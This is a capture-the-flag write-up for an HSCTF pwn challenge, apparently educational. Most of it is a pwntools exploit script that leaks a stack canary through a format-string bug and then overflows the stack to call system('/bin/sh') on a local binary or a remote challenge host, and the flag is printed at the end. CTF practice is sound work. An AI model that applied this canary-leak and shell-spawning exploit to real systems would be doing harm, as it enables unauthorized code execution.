The king of pwn

题目

解题报告

#!/usr/bin/env python
# coding=utf-8
import sys
from pwn import *
"""
知识点:格式化字符串，栈溢出利用
构造步骤:
    1.利用prinf获取栈内容
    2.构造包含原始栈信息的payload绕过canary保护
    3.利用栈溢出get shell
    HSCTF{K44p-7ring}
"""
if len(sys.argv) > 1:
    p = remote("139.199.165.63", 10001)
else:
    p = process("./pwn1")
    context.log_level = 'debug'


def create_player(player_name):
    p.recvuntil("4.Confirm\n")
    p.sendline("1") 
    p.recvuntil("Player name?\n")
    p.sendline(player_name) 


def change_player_name(player_name):
    p.recvuntil("4.Confirm\n")
    p.sendline("2") 
    p.recvuntil("player name\n")
    p.sendline(player_name) 


def print_player_name():
    p.recvuntil("4.Confirm\n")
    p.sendline("3") 


def get_fmt_offset():
    payload = "AAAA%%%d$08x"
    for i in range(1, 20):
        change_player_name(payload % i) 
        print_player_name()
        if "4141" in p.readline():
            return i


def get_canary(offset):
    canary = ""
    payload = "%%%d$08x"
    for i in range(offset, offset + 8):
        change_player_name(payload % i) 
        print_player_name()
        byte4 = int(p.read(2), 16)
        byte3 = int(p.read(2), 16)
        byte2 = int(p.read(2), 16)
        byte1 = int(p.read(2), 16)
        canary += p8(byte1) + p8(byte2) + p8(byte3) + p8(byte4) 
    return canary


def get_shell(canary, system_addr, sh_addr):
    p.recvuntil("4.Confirm\n")
    p.sendline("4") 
    payload = "AAAABBBBCCCCDDDD"
    payload += canary
    payload += p32(system_addr)
    payload += "AAAA"
    payload += p32(sh_addr)
    p.send(payload)
    p.interactive()


def pwn():
    system_addr = 0x08048430 
    sh_addr = 0x08048820
    create_player("Sloth 003")
    offset = get_fmt_offset() 
    canary = get_canary(offset + 4)
    get_shell(canary, system_addr, sh_addr)


if __name__ == '__main__':
    pwn()

Flag:HSCTF{K44p-7ring}